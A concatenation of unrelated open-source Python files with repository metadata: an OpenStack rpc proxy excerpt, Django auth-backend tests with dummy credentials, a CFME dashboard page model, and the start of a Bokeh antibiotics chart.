remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.cast(context, self._get_topic(topic), msg)
def fanout_cast(self, context, msg, topic=None, version=None):
"""rpc.fanout_cast() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.fanout_cast() does not wait on any return value
from the remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.fanout_cast(context, self._get_topic(topic), msg)
def cast_to_server(self, context, server_params, msg, topic=None,
version=None):
"""rpc.cast_to_server() a remote method.
:param context: The request context
:param server_params: Server parameters. See rpc.cast_to_server() for
details.
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.cast_to_server() does not wait on any
return values.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.cast_to_server(context, server_params, self._get_topic(topic), msg)
def fanout_cast_to_server(self, context, server_params, msg, topic=None,
version=None):
"""rpc.fanout_cast_to_server() a remote method.
:param context: The request context
:param server_params: Server parameters. See rpc.cast_to_server() for
details.
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.fanout_cast_to_server() does not wait on any
return values.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.fanout_cast_to_server(context, server_params,
self._get_topic(topic), msg)
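# --- Hypothetical usage sketch (not part of the openstack.common module above) ---
# The class docstring above says RpcProxy is meant to be subclassed by the
# client side of an rpc API; a minimal subclass could look like this (the
# topic, version and method names are invented for illustration):
class ExampleAPI(RpcProxy):
    BASE_RPC_API_VERSION = '1.0'
    def __init__(self):
        super(ExampleAPI, self).__init__(topic='example',
                                         default_version=self.BASE_RPC_API_VERSION)
    def ping(self, context, payload):
        # call() blocks until the remote 'ping' method returns its result
        return self.call(context, self.make_msg('ping', payload=payload))
    def notify(self, context, payload):
        # cast() sends the message without waiting for a return value
        self.cast(context, self.make_msg('notify', payload=payload))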
|
rackerlabs/instrumented-ceilometer
|
ceilometer/openstack/common/rpc/proxy.py
|
Python
|
apache-2.0
| 9,444 | 0 |
from __future__ import unicode_literals
from datetime import date
from django.contrib.auth import (
BACKEND_SESSION_KEY, SESSION_KEY, authenticate, get_user,
)
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.hashers import MD5PasswordHasher
from django.contrib.auth.models import AnonymousUser, Group, Permission, User
from django.contrib.auth.tests.custom_user import CustomUser, ExtensionUser
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.http import HttpRequest
from django.test import (
SimpleTestCase, TestCase, modify_settings, override_settings,
)
from .models import CustomPermissionsUser, UUIDUser
class CountingMD5PasswordHasher(MD5PasswordHasher):
"""Hasher that counts how many times it computes a hash."""
calls = 0
def encode(self, *args, **kwargs):
type(self).calls += 1
return super(CountingMD5PasswordHasher, self).encode(*args, **kwargs)
class BaseModelBackendTest(object):
"""
A base class for tests that need to validate the ModelBackend
with different User models. Subclasses should define a class
level UserModel attribute, and a create_users() method to
construct two users for test purposes.
"""
backend = 'django.contrib.auth.backends.ModelBackend'
def setUp(self):
self.patched_settings = modify_settings(
AUTHENTICATION_BACKENDS={'append': self.backend},
)
self.patched_settings.enable()
self.create_users()
def tearDown(self):
self.patched_settings.disable()
# The custom_perms test messes with ContentTypes, which will
# be cached; flush the cache to ensure there are no side effects
# Refs #14975, #14925
ContentType.objects.clear_cache()
def test_has_perm(self):
user = self.UserModel._default_manager.get(pk=self.user.pk)
self.assertEqual(user.has_perm('auth.test'), False)
user.is_staff = True
user.save()
self.assertEqual(user.has_perm('auth.test'), False)
user.is_superuser = True
user.save()
self.assertEqual(user.has_perm('auth.test'), True)
user.is_staff = True
user.is_superuser = True
user.is_active = False
user.save()
self.assertEqual(user.has_perm('auth.test'), False)
def test_custom_perms(self):
user = self.UserModel._default_manager.get(pk=self.user.pk)
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
user.user_permissions.add(perm)
# reloading user to purge the _perm_cache
user = self.UserModel._default_manager.get(pk=self.user.pk)
self.assertEqual(user.get_all_permissions() == {'auth.test'}, True)
self.assertEqual(user.get_group_permissions(), set())
self.assertEqual(user.has_module_perms('Group'), False)
self.assertEqual(user.has_module_perms('auth'), True)
perm = Permission.objects.create(name='test2', content_type=content_type, codename='test2')
user.user_permissions.add(perm)
perm = Permission.objects.create(name='test3', content_type=content_type, codename='test3')
user.user_permissions.add(perm)
user = self.UserModel._default_manager.get(pk=self.user.pk)
self.assertEqual(user.get_all_permissions(), {'auth.test2', 'auth.test', 'auth.test3'})
self.assertEqual(user.has_perm('test'), False)
self.assertEqual(user.has_perm('auth.test'), True)
self.assertEqual(user.has_perms(['auth.test2', 'auth.test3']), True)
perm = Permission.objects.create(name='test_group', content_type=content_type, codename='test_group')
group = Group.objects.create(name='test_group')
group.permissions.add(perm)
user.groups.add(group)
user = self.UserModel._default_manager.get(pk=self.user.pk)
exp = {'auth.test2', 'auth.test', 'auth.test3', 'auth.test_group'}
self.assertEqual(user.get_all_permissions(), exp)
self.assertEqual(user.get_group_permissions(), {'auth.test_group'})
self.assertEqual(user.has_perms(['auth.test3', 'auth.test_group']), True)
user = AnonymousUser()
self.assertEqual(user.has_perm('test'), False)
self.assertEqual(user.has_perms(['auth.test2', 'auth.test3']), False)
def test_has_no_object_perm(self):
"""Regressiontest for #12462"""
user = self.UserModel._default_manager.get(pk=self.user.pk)
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
user.user_permissions.add(perm)
self.assertEqual(user.has_perm('auth.test', 'object'), False)
self.assertEqual(user.get_all_permissions('object'), set())
self.assertEqual(user.has_perm('auth.test'), True)
self.assertEqual(user.get_all_permissions(), {'auth.test'})
def test_anonymous_has_no_permissions(self):
"""
#17903 -- Anonymous users shouldn't have permissions in
ModelBackend.get_(all|user|group)_permissions().
"""
backend = ModelBackend()
user = self.UserModel._default_manager.get(pk=self.user.pk)
content_type = ContentType.objects.get_for_model(Group)
user_perm = Permission.objects.create(name='test', content_type=content_type, codename='test_user')
group_perm = Permission.objects.create(name='test2', content_type=content_type, codename='test_group')
user.user_permissions.add(user_perm)
group = Group.objects.create(name='test_group')
user.groups.add(group)
group.permissions.add(group_perm)
self.assertEqual(backend.get_all_permissions(user), {'auth.test_user', 'auth.test_group'})
self.assertEqual(backend.get_user_permissions(user), {'auth.test_user', 'auth.test_group'})
self.assertEqual(backend.get_group_permissions(user), {'auth.test_group'})
user.is_anonymous = lambda: True
self.assertEqual(backend.get_all_permissions(user), set())
self.assertEqual(backend.get_user_permissions(user), set())
self.assertEqual(backend.get_group_permissions(user), set())
def test_inactive_has_no_permissions(self):
"""
#17903 -- Inactive users shouldn't have permissions in
ModelBackend.get_(all|user|group)_permissions().
"""
backend = ModelBackend()
user = self.UserModel._default_manager.get(pk=self.user.pk)
content_type = ContentType.objects.get_for_model(Group)
user_perm = Permission.objects.create(name='test', content_type=content_type, codename='test_user')
group_perm = Permission.objects.create(name='test2', content_type=content_type, codename='test_group')
user.user_permissions.add(user_perm)
group = Group.objects.create(name='test_group')
user.groups.add(group)
group.permissions.add(group_perm)
self.assertEqual(backend.get_all_permissions(user), {'auth.test_user', 'auth.test_group'})
self.assertEqual(backend.get_user_permissions(user), {'auth.test_user', 'auth.test_group'})
self.assertEqual(backend.get_group_permissions(user), {'auth.test_group'})
user.is_active = False
user.save()
self.assertEqual(backend.get_all_permissions(user), set())
self.assertEqual(backend.get_user_permissions(user), set())
self.assertEqual(backend.get_group_permissions(user), set())
def test_get_all_superuser_permissions(self):
"""A superuser has all permissions. Refs #14795."""
user = self.UserModel._default_manager.get(pk=self.superuser.pk)
self.assertEqual(len(user.get_all_permissions()), len(Permission.objects.all()))
@override_settings(PASSWORD_HASHERS=['auth_tests.test_auth_backends.CountingMD5PasswordHasher'])
def test_authentication_timing(self):
"""Hasher is run once regardless of whether the user exists. Refs #20760."""
# Re-set the password, because this test overrides PASSWORD_HASHERS
self.user.set_password('test')
self.user.save()
CountingMD5PasswordHasher.calls = 0
username = getattr(self.user, self.UserModel.USERNAME_FIELD)
authenticate(username=username, password='test')
self.assertEqual(CountingMD5PasswordHasher.calls, 1)
CountingMD5PasswordHasher.calls = 0
authenticate(username='no_such_user', password='test')
self.assertEqual(CountingMD5PasswordHasher.calls, 1)
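# ModelBackend hashes the password even when the username does not exist,
# so response timing does not reveal whether an account is present.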
class ModelBackendTest(BaseModelBackendTest, TestCase):
"""
Tests for the ModelBackend using the default User model.
"""
UserModel = User
def create_users(self):
self.user = User.objects.create_user(
username='test',
email='[email protected]',
password='test',
)
self.superuser = User.objects.create_superuser(
username='test2',
email='[email protected]',
password='test',
)
@override_settings(AUTH_USER_MODEL='auth.ExtensionUser')
class ExtensionUserModelBackendTest(BaseModelBackendTest, TestCase):
"""
Tests for the ModelBackend using the custom ExtensionUser model.
This isn't a perfect test, because both the User and ExtensionUser are
synchronized to the database, which wouldn't ordinarily happen in
production. As a result, it doesn't catch errors caused by the non-
existence of the User table.
The specific problem is queries on .filter(groups__user) et al, which
make an implicit assumption that the user model is called 'User'. In
production, the auth.User table won't exist, so the requested join
won't exist either; in testing, the auth.User *does* exist, and
so does the join. However, the join table won't contain any useful
data; for testing, we check that the data we expect actually does exist.
"""
UserModel = ExtensionUser
def create_users(self):
self.user = ExtensionUser._default_manager.create_user(
username='test',
email='[email protected]',
password='test',
date_of_birth=date(2006, 4, 25)
)
self.superuser = ExtensionUser._default_manager.create_superuser(
username='test2',
email='[email protected]',
password='test',
date_of_birth=date(1976, 11, 8)
)
@override_settings(AUTH_USER_MODEL='auth_tests.CustomPermissionsUser')
class CustomPermissionsUserModelBackendTest(BaseModelBackendTest, TestCase):
"""
Tests for the ModelBackend using the CustomPermissionsUser model.
As with the ExtensionUser test, this isn't a perfect test, because both
the User and CustomPermissionsUser are synchronized to the database,
which wouldn't ordinarily happen in production.
"""
UserModel = CustomPermissionsUser
def create_users(self):
self.user = CustomPermissionsUser._default_manager.create_user(
email='[email protected]',
password='test',
date_of_birth=date(2006, 4, 25)
)
self.superuser = CustomPermissionsUser._default_manager.create_superuser(
email='[email protected]',
password='test',
date_of_birth=date(1976, 11, 8)
)
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
class CustomUserModelBackendAuthenticateTest(TestCase):
"""
Tests that the model backend can accept a credentials kwarg labeled with
the custom user model's USERNAME_FIELD.
"""
def test_authenticate(self):
test_user = CustomUser._default_manager.create_user(
email='[email protected]',
password='test',
date_of_birth=date(2006, 4, 25)
)
authenticated_user = authenticate(email='[email protected]', password='test')
self.assertEqual(test_user, authenticated_user)
@override_settings(AUTH_USER_MODEL='auth_tests.UUIDUser')
class UUIDUserTests(TestCase):
def test_login(self):
"""
A custom user with a UUID primary key should be able to log in.
"""
user = UUIDUser.objects.create_user(username='uuid', password='test')
self.assertTrue(self.client.login(username='uuid', password='test'))
self.assertEqual(UUIDUser.objects.get(pk=self.client.session[SESSION_KEY]), user)
class TestObj(object):
pass
class SimpleRowlevelBackend(object):
def has_perm(self, user, perm, obj=None):
if not obj:
return # We only support row level perms
if isinstance(obj, TestObj):
if user.username == 'test2':
return True
elif user.is_anonymous() and perm == 'anon':
return True
elif not user.is_active and perm == 'inactive':
return True
return False
def has_module_perms(self, user, app_label):
if not user.is_anonymous() and not user.is_active:
return False
return app_label == "app1"
def get_all_permissions(self, user, obj=None):
if not obj:
return [] # We only support row level perms
if not isinstance(obj, TestObj):
return ['none']
if user.is_anonymous():
return ['anon']
if user.username == 'test2':
return ['simple', 'advanced']
else:
return ['simple']
def get_group_permissions(self, user, obj=None):
if not obj:
return # We only support row level perms
if not isinstance(obj, TestObj):
return ['none']
if 'test_group' in [group.name for group in user.groups.all()]:
return ['group_perm']
else:
return ['none']
@modify_settings(AUTHENTICATION_BACKENDS={
'append': 'auth_tests.test_auth_backends.SimpleRowlevelBackend',
})
class RowlevelBackendTest(TestCase):
"""
Tests for auth backend that supports object level permissions
"""
def setUp(self):
self.user1 = User.objects.create_user('test', '[email protected]', 'test')
self.user2 = User.objects.create_user('test2', '[email protected]', 'test')
self.user3 = User.objects.create_user('test3', '[email protected]', 'test')
def tearDown(self):
# The get_group_permissions test messes with ContentTypes, which will
# be cached; flush the cache to ensure there are no side effects
# Refs #14975, #14925
ContentType.objects.clear_cache()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user2.has_perm('perm', TestObj()), True)
self.assertEqual(self.user2.has_perm('perm'), False)
self.assertEqual(self.user2.has_perms(['simple', 'advanced'], TestObj()), True)
self.assertEqual(self.user3.has_perm('perm', TestObj()), False)
self.assertEqual(self.user3.has_perm('anon', TestObj()), False)
self.assertEqual(self.user3.has_perms(['simple', 'advanced'], TestObj()), False)
def test_get_all_permissions(self):
self.assertEqual(self.user1.get_all_permissions(TestObj()), {'simple'})
self.assertEqual(self.user2.get_all_permissions(TestObj()), {'simple', 'advanced'})
self.assertEqual(self.user2.get_all_permissions(), set())
def test_get_group_permissions(self):
group = Group.objects.create(name='test_group')
self.user3.groups.add(group)
self.assertEqual(self.user3.get_group_permissions(TestObj()), {'group_perm'})
@override_settings(
AUTHENTICATION_BACKENDS=['auth_tests.test_auth_backends.SimpleRowlevelBackend'],
)
class AnonymousUserBackendTest(SimpleTestCase):
"""
Tests for AnonymousUser delegating to backend.
"""
def setUp(self):
self.user1 = AnonymousUser()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user1.has_perm('anon', TestObj()), True)
def test_has_perms(self):
self.assertEqual(self.user1.has_perms(['anon'], TestObj()), True)
self.assertEqual(self.user1.has_perms(['anon', 'perm'], TestObj()), False)
def test_has_module_perms(self):
self.assertEqual(self.user1.has_module_perms("app1"), True)
self.assertEqual(self.user1.has_module_perms("app2"), False)
def test_get_all_permissions(self):
self.assertEqual(self.user1.get_all_permissions(TestObj()), {'anon'})
@override_settings(AUTHENTICATION_BACKENDS=[])
class NoBackendsTest(TestCase):
"""
Tests that an appropriate error is raised if no auth backends are provided.
"""
def setUp(self):
self.user = User.objects.create_user('test', '[email protected]', 'test')
def test_raises_exception(self):
with self.assertRaises(ImproperlyConfigured):
self.user.has_perm(('perm', TestObj()))
@override_settings(AUTHENTICATION_BACKENDS=['auth_tests.test_auth_backends.SimpleRowlevelBackend'])
class InActiveUserBackendTest(TestCase):
"""
Tests for an inactive user
"""
def setUp(self):
self.user1 = User.objects.create_user('test', '[email protected]', 'test')
self.user1.is_active = False
self.user1.save()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user1.has_perm('inactive', TestObj()), True)
def test_has_module_perms(self):
self.assertEqual(self.user1.has_module_perms("app1"), False)
self.assertEqual(self.user1.has_module_perms("app2"), False)
class PermissionDeniedBackend(object):
"""
Always raises PermissionDenied in `authenticate`, `has_perm` and `has_module_perms`.
"""
def authenticate(self, username=None, password=None):
raise PermissionDenied
def has_perm(self, user_obj, perm, obj=None):
raise PermissionDenied
def has_module_perms(self, user_obj, app_label):
raise PermissionDenied
class PermissionDeniedBackendTest(TestCase):
"""
Tests that other backends are not checked once a backend raises PermissionDenied
"""
backend = 'auth_tests.test_auth_backends.PermissionDeniedBackend'
def setUp(self):
self.user1 = User.objects.create_user('test', '[email protected]', 'test')
self.user1.save()
@modify_settings(AUTHENTICATION_BACKENDS={'prepend': backend})
def test_permission_denied(self):
"user is not authenticated after a backend raises permission denied #2550"
self.assertEqual(authenticate(username='test', password='test'), None)
@modify_settings(AUTHENTICATION_BACKENDS={'append': backend})
def test_authenticates(self):
self.assertEqual(authenticate(username='test', password='test'), self.user1)
@modify_settings(AUTHENTICATION_BACKENDS={'prepend': backend})
def test_has_perm_denied(self):
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
self.user1.user_permissions.add(perm)
self.assertIs(self.user1.has_perm('auth.test'), False)
self.assertIs(self.user1.has_module_perms('auth'), False)
@modify_settings(AUTHENTICATION_BACKENDS={'append': backend})
def test_has_perm(self):
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
self.user1.user_permissions.add(perm)
self.assertIs(self.user1.has_perm('auth.test'), True)
self.assertIs(self.user1.has_module_perms('auth'), True)
class NewModelBackend(ModelBackend):
pass
class ChangedBackendSettingsTest(TestCase):
"""
Tests for changes in the settings.AUTHENTICATION_BACKENDS
"""
backend = 'auth_tests.test_auth_backends.NewModelBackend'
TEST_USERNAME = 'test_user'
TEST_PASSWORD = 'test_password'
TEST_EMAIL = '[email protected]'
def setUp(self):
User.objects.create_user(self.TEST_USERNAME,
self.TEST_EMAIL,
self.TEST_PASSWORD)
@override_settings(AUTHENTICATION_BACKENDS=[backend])
def test_changed_backend_settings(self):
"""
Tests that removing a backend configured in AUTHENTICATION_BACKENDS
makes already logged-in users disconnect.
"""
# Get a session for the test user
self.assertTrue(self.client.login(
username=self.TEST_USERNAME,
password=self.TEST_PASSWORD)
)
# Prepare a request object
request = HttpRequest()
request.session = self.client.session
# Remove NewModelBackend
with self.settings(AUTHENTICATION_BACKENDS=[
'django.contrib.auth.backends.ModelBackend']):
# Get the user from the request
user = get_user(request)
# Assert that the user retrieval is successful and the user is
# anonymous as the backend is no longer available.
self.assertIsNotNone(user)
self.assertTrue(user.is_anonymous())
class TypeErrorBackend(object):
"""
Always raises TypeError.
"""
def authenticate(self, username=None, password=None):
raise TypeError
class TypeErrorBackendTest(TestCase):
"""
Tests that a TypeError within a backend is propagated properly.
Regression test for ticket #18171
"""
backend = 'auth_tests.test_auth_backends.TypeErrorBackend'
def setUp(self):
self.user1 = User.objects.create_user('test', '[email protected]', 'test')
@override_settings(AUTHENTICATION_BACKENDS=[backend])
def test_type_error_raised(self):
with self.assertRaises(TypeError):
authenticate(username='test', password='test')
class ImproperlyConfiguredUserModelTest(TestCase):
"""
Tests that an exception from within get_user_model is propagated and doesn't
raise an UnboundLocalError.
Regression test for ticket #21439
"""
def setUp(self):
self.user1 = User.objects.create_user('test', '[email protected]', 'test')
self.client.login(
username='test',
password='test'
)
@override_settings(AUTH_USER_MODEL='thismodel.doesntexist')
def test_does_not_shadow_exception(self):
# Prepare a request object
request = HttpRequest()
request.session = self.client.session
with self.assertRaises(ImproperlyConfigured):
get_user(request)
class ImportedModelBackend(ModelBackend):
pass
class CustomModelBackend(ModelBackend):
pass
class OtherModelBackend(ModelBackend):
pass
class ImportedBackendTests(TestCase):
"""
#23925 - The backend path added to the session should be the same
as the one defined in AUTHENTICATION_BACKENDS setting.
"""
backend = 'auth_tests.backend_alias.ImportedModelBackend'
@override_settings(AUTHENTICATION_BACKENDS=[backend])
def test_backend_path(self):
username = 'username'
password = 'password'
User.objects.create_user(username, 'email', password)
self.assertTrue(self.client.login(username=username, password=password))
request = HttpRequest()
request.session = self.client.session
self.assertEqual(request.session[BACKEND_SESSION_KEY], self.backend)
class SelectingBackendTests(TestCase):
backend = 'auth_tests.test_auth_backends.CustomModelBackend'
other_backend = 'auth_tests.test_auth_backends.OtherModelBackend'
username = 'username'
password = 'password'
def assertBackendInSession(self, backend):
request = HttpRequest()
request.session = self.client.session
self.assertEqual(request.session[BACKEND_SESSION_KEY], backend)
@override_settings(AUTHENTICATION_BACKENDS=[backend])
def test_backend_path_login_without_authenticate_single_backend(self):
user = User.objects.create_user(self.username, 'email', self.password)
self.client._login(user)
self.assertBackendInSession(self.backend)
@override_settings(AUTHENTICATION_BACKENDS=[backend, other_backend])
def test_backend_path_login_without_authenticate_multiple_backends(self):
user = User.objects.create_user(self.username, 'email', self.password)
expected_message = (
'You have multiple authentication backends configured and '
'therefore must provide the `backend` argument or set the '
'`backend` attribute on the user.'
)
with self.assertRaisesMessage(ValueError, expected_message):
self.client._login(user)
@override_settings(AUTHENTICATION_BACKENDS=[backend, other_backend])
def test_backend_path_login_with_explicit_backends(self):
user = User.objects.create_user(self.username, 'email', self.password)
self.client._login(user, self.other_backend)
self.assertBackendInSession(self.other_backend)
|
varunnaganathan/django
|
tests/auth_tests/test_auth_backends.py
|
Python
|
bsd-3-clause
| 25,359 | 0.001814 |
# -*- coding: utf-8 -*-
"""Page model for Cloud Intel / Reports / Dashboards"""
from navmazing import NavigateToAttribute, NavigateToSibling
from widgetastic.widget import Text, Checkbox
from widgetastic_manageiq import SummaryFormItem, DashboardWidgetsPicker
from widgetastic_patternfly import Button, Input
from utils.appliance import Navigatable
from utils.appliance.implementations.ui import navigator, CFMENavigateStep, navigate_to
from utils.pretty import Pretty
from utils.update import Updateable
from . import CloudIntelReportsView
class DashboardAllGroupsView(CloudIntelReportsView):
title = Text("#explorer_title_text")
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboards for "{}"'.format(self.context["object"].group) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group
]
)
class DashboardFormCommon(CloudIntelReportsView):
title = Text("#explorer_title_text")
basic_information = Text(".//div[@id='form_div']/h3")
name = Input(name="name")
tab_title = Input(name="description")
locked = Checkbox("locked")
sample_dashboard = Text(".//div[@id='form_widgets_div']/h3")
widgets = DashboardWidgetsPicker(
"form_widgets_div",
select_id="widget",
names_locator=".//a[starts-with(@id, 'w_')]/..",
remove_locator=".//div[contains(@title, {})]//a/i"
)
cancel_button = Button("Cancel")
class NewDashboardView(DashboardFormCommon):
add_button = Button("Add")
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Adding a new dashboard" and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group
]
)
class EditDashboardView(DashboardFormCommon):
save_button = Button("Save")
reset_button = Button("Reset")
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Editing Dashboard {}".format(self.context["object"].name) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group,
self.context["object"].name
]
)
class EditDefaultDashboardView(EditDashboardView):
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Editing Dashboard {}".format(self.context["object"].name) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"{} ({})".format(self.context["object"].title, self.context["object"].name)
]
)
class DashboardDetailsView(CloudIntelReportsView):
SAMPLE_DASHBOARD_ROOT = ".//div[@id='modules']"
ITEM_TITLE_LOCATOR = ".//h3[contains(@class, 'panel-title')]"
title = Text("#explorer_title_text")
name = SummaryFormItem("Basic Information", "Name")
tab_title = SummaryFormItem("Basic Information", "Tab Title")
@property
def selected_items(self):
items = []
for el in self.browser.elements(self.ITEM_TITLE_LOCATOR, self.SAMPLE_DASHBOARD_ROOT):
items.append(self.browser.text(el))
return items
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboard "{} ({})"'.format(
self.context["object"].title,
self.context["object"].name
) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group,
self.context["object"].name
]
)
class DefaultDashboardDetailsView(DashboardDetailsView):
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboard "{} ({})"'.format(
self.context["object"].title,
self.context["object"].name
) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"{} ({})".format(self.context["object"].title, self.context["object"].name)
]
)
class Dashboard(Updateable, Pretty, Navigatable):
pretty_attrs = ["name", "group", "title", "widgets"]
def __init__(self, name, group, title=None, locked=None, widgets=None, appliance=None):
Navigatable.__init__(self, appliance)
self.name = name
self.title = title
self.locked = locked
self.widgets = widgets
self._group = group
@property
def group(self):
return self._group
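# Illustrative usage (sketch; the group and widget names below are made up):
# Dashboard(name='ops', group='EvmGroup-administrator', title='Ops',
#           widgets=['Top CPU Consumers']).create()
# navigates to the Add form, fills it, and asserts the success flash message.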
def create(self, cancel=False):
"""Create this Dashboard in the UI."""
view = navigate_to(self, "Add")
view.fill({
"name": self.name,
"tab_title": self.title,
"locked": self.locked,
"widgets": self.widgets
})
view.add_button.click()
view = self.create_view(DashboardAllGroupsView)
assert view.is_displayed
view.flash.assert_no_error()
view.flash.assert_message('Dashboard "{}" was saved'.format(self.name))
def update(self, updates):
"""Update this Dashboard in the UI.
Args:
updates: Provided by update() context manager.
"""
view = navigate_to(self, "Edit")
changed = view.fill(updates)
if changed:
view.save_button.click()
else:
view.cancel_button.click()
for attr, value in updates.items():
setattr(self, attr, value)
view = self.create_view(DashboardDetailsView)
assert view.is_displayed
view.flash.assert_no_error()
if changed:
view.flash.assert_message('Dashboard "{}" was saved'.format(self.name))
else:
view.flash.assert_message(
'Edit of Dashboard "{}" was cancelled by the user'.format(self.name))
def delete(self, cancel=False):
"""Delete this Dashboard in the UI.
Args:
cancel: Whether to cancel the deletion (default False).
"""
view = navigate_to(self, "Details")
view.configuration.item_select(
"Delete this Dashboard from the Database",
handle_alert=not cancel
)
if cancel:
assert view.is_displayed
view.flash.assert_no_error()
else:
view = self.create_view(DashboardAllGroupsView)
assert view.is_displayed
view.flash.assert_no_error()
class DefaultDashboard(Updateable, Pretty, Navigatable):
pretty_attrs = ["name", "title", "widgets"]
def __init__(self, title="Default Dashboard", locked=None, widgets=None, appliance=None):
Navigatable.__init__(self, appliance)
self.title = title
self.locked = locked
self.widgets = widgets
@property
def name(self):
"""Name of Default Dashboard cannot be changed."""
return "default"
def update(self, updates):
"""Update Default Dashboard in the UI.
Args:
updates: Provided by update() context manager.
"""
view = navigate_to(self, "Edit")
changed = view.fill(updates)
if changed:
view.save_button.click()
else:
view.cancel_button.click()
view = self.create_view(DefaultDashboardDetailsView)
assert view.is_displayed
if changed:
view.flash.assert_success_message('Dashboard "{}" was saved'.format(self.name))
else:
view.flash.assert_success_message(
'Edit of Dashboard "{}" was cancelled by the user'.format(self.name))
@navigator.register(Dashboard, "Add")
class DashboardNew(CFMENavigateStep):
VIEW = NewDashboardView
prerequisite = NavigateToAttribute("appliance.server", "CloudIntelReports")
def step(self):
self.prerequisite_view.dashboards.tree.click_path(
"All Dashboards",
"All Groups",
self.obj.group
)
self.prerequisite_view.configuration.item_select("Add a new Dashboard")
@navigator.register(Dashboard, "Edit")
class DashboardEdit(CFMENavigateStep):
VIEW = EditDashboardView
prerequisite = NavigateToSibling("Details")
def step(self):
self.prerequisite_view.configuration.item_select("Edit this Dashboard")
@navigator.register(DefaultDashboard, "Edit")
class DefaultDashboardEdit(CFMENavigateStep):
VIEW = EditDefaultDashboardView
prerequisite = NavigateToSibling("Details")
def step(self):
self.prerequisite_view.configuration.item_select("Edit this Dashboard")
@navigator.register(Dashboard, "Details")
class DashboardDetails(CFMENavigateStep):
VIEW = DashboardDetailsView
prerequisite = NavigateToAttribute("appliance.server", "CloudIntelReports")
def step(self):
self.prerequisite_view.dashboards.tree.click_path(
"All Dashboards",
"All Groups",
self.obj.group,
self.obj.name
)
@navigator.register(DefaultDashboard, "Details")
class DefaultDashboardDetails(CFMENavigateStep):
VIEW = DefaultDashboardDetailsView
prerequisite = NavigateToAttribute("appliance.server", "CloudIntelReports")
def step(self):
self.prerequisite_view.dashboards.tree.click_path(
"All Dashboards",
"{} ({})".format(self.obj.title, self.obj.name)
)
|
dajohnso/cfme_tests
|
cfme/intelligence/reports/dashboards.py
|
Python
|
gpl-2.0
| 10,188 | 0.001276 |
# The plot server must be running
# Go to http://localhost:5006/bokeh to view this plot
from collections import OrderedDict
from math import log, sqrt
import numpy as np
import pandas as pd
from six.moves import cStringIO as StringIO
from bokeh.plotting import figure, show, output_server
antibiotics = """
bacteria, penicillin, streptomycin, neomycin, gram
Mycobacterium tuberculosis, 800, 5, 2, negative
Salmonella schottmuelleri, 10, 0.8, 0.09, negative
Proteus vulgaris, 3, 0.1, 0.1, negative
Klebsiella pneumoniae, 850, 1.2, 1, negative
Brucella abortus, 1, 2, 0.02, negative
Pseudomonas aeruginosa, 850, 2, 0.4, negative
Escherichia coli, 100, 0.4, 0.1, negative
Salmonella (Eberthella) typhosa, 1, 0.4, 0.008, negative
Aerobacter aerogenes, 870, 1, 1.6, negative
Brucella antracis, 0.001, 0.01, 0.007, positive
Streptococcus fecalis, 1, 1, 0.1, positive
Staphylococcus aureus, 0.03, 0.03, 0.001, positive
Staphylococcus albus, 0.007, 0.1, 0.001, positive
Streptococcus hemolyticus, 0.001, 14, 10, positive
Streptococcus viridans, 0.005, 10, 40, positive
Diplococcus pneumoniae, 0.005, 11, 10, positive
"""
drug_color = OrderedDict([
("Penicillin", "#0d3362"),
("Streptomycin", "#c64737"),
("Neomycin", "black" ),
])
gram_color = {
"positive" : "#aeaeb8",
"negative" : "#e69584",
}
df = pd.read_csv(StringIO(antibiotics),
skiprows=1,
skipinitialspace=True,
engine='python')
width = 800
height = 800
inner_radius = 90
outer_radius = 300 - 10
minr = sqrt(log(.001 * 1E4))
maxr = sqrt(log(1000 * 1E4))
a = (outer_radius - inner_radius) / (minr - maxr)
b = inner_radius - a * maxr
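# Burtin-style radial scale: a MIC value maps to a radius via
# r = a * sqrt(log(mic * 1E4)) + b, with a and b chosen so that mic = 0.001
# lands on the outer radius and mic = 1000 on the inner radius, i.e. lower
# (more effective) MIC values draw longer bars.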
def rad(mic):
return a * np.sqrt(np.log(mic * 1E4)) + b
big_angle = 2.0 * np.pi / (len(df) + 1)
small_angle = big_angle / 7
